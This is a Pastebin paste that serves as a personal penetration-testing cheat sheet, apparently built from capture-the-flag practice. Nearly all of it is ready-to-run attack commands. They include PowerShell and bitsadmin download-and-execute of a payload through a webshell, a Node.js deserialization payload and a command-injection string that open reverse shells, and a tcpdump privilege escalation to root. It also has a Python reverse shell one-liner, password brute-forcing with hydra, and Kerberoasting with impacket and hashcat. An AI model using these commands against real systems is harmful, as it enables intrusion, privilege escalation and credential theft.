Harcrack

something useful to remember

Oct 30th, 2018
912
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.80 KB | None | 0 0
  1. disable randomiaze va
  2. echo 0 > /proc/sys/kernel/randomize_va_space
  3. enable it with echo 2
  4.  
  5. powershell download files thorugh webshell
  6. First command: powershell $WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://10.10.15.248:9090/payload.exe","C:\inetpub\wwwroot\UploadedFiles\payload.exe")
  7.  
  8. powershell $WebClient = (New-Object System.Net.WebClient).DownloadFile("http://10.10.15.248:9090/payload.exe","C:\inetpub\wwwroot\UploadedFiles\payload.exe")
  9.  
  10. Second command: powershell C:\inetpub\wwwroot\UploadedFiles\payload.exe
  11. bitsadmin /transfer myjob /download /priority high http://10.10.15.248:9090/payload.exe %tmp%\payload.exe&start %tmp%\payload.exe"
  12. Invoke-WebRequest -Uri "http://10.10.15.248/x00/payload.exe" -OutFile "C:\inetpub\wwwroot\UploadedFiles\payload.exe"
  13. June 12
  14.  
  15. gobuster -u "MACHINEURL" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  16. runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe
  17.  
  18. hydra -V -l admin -P /usr/share/wordlists/rockyout.txt 10.10.10.86 http-post-form '/login:username=^USER^&password=^PASS^&submit=Login:F=Error: Login failed.'
  19. nikto -h
  20. wpscan
  21. cat dic | sort -u | uniq > dic.dic
  22. find / -perm 4000 2>/dev/null
  23. nmap --interactive #to launch a shell form nmap
  24. !sh
  25.  
  26. curl -X POST -d "file=/var/www/development/uploader/FRANKuploads/php-reverse-shell.gif" http://192.168.0.112:8011/api/files_api.php
  27.  
  28. node serializations payload
  29.  
  30. {"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('bash -i >& /dev/tcp/192.168.43.2/1234 0>&1',(e,out,err)=>{console.log(out);}); }()"}
  31.  
  32. ssmanager exploit
  33.  
  34. netstat -ant
  35. netsat -anu
  36.  
  37. nc -u 127.0.0.1 8839
  38. again nc -u 127.0.0.1 8839
  39. add: {"server_port":8003, "password":"test", "method":"||nc 192.168.0.111 3333 -e /bin/bash||"}
  40.  
  41. tcpdump privilege scalation
  42. cd /tmp
  43. echo "nc -e /bin/bash 192.168.43.2 5555"> shell
  44. chmod 777 shell
  45. sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell -Z root
  46.  
  47. python reverse shell
  48.  
  49. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  50.  
  51. SERVER/SVC_TGS:[email protected]
  52.  
  53. KERBEROAST
  54. first find a user
  55. then try to find the adminstrator domain
  56. ldapsearch -x -b "dc=active,dc=htb" -D "[email protected]" -h 10.10.10.100 -W '(&(objectCategory=person)(objectClass=user))' (USER's)
  57.  
  58. then get a signed ticket from the admins account with impacket
  59.  
  60. GetUserSPNs.py -request -outputfile 20180105_kerberoast.txt -dc-ip 10.10.10.100 active.htb/SVC_TGS
  61.  
  62. then crack the hash
  63. hashcat -a 0 -m 13100 20180105_kerberoast.txt /usr/share/wordlists/rockyou.txt --force
  64. then just psexec.py from impacket
Advertisement
Add Comment
Please, Sign In to add comment